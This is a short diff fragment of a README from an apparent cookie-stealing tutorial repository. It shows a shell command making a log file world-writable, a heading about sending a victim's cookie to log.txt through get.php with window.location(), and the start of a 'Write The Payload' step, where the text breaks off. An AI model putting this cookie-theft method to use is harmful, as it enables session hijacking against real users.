YasserREED/Stealling_Cookies/README.md

 YasserREED> sudo chmod 777 log.txt

-# Send The Cookie to log.txt by get.php using window.location() function:
+# Send The Cookie to log.txt by get.php using window.location() function

 1 - Write The Payload: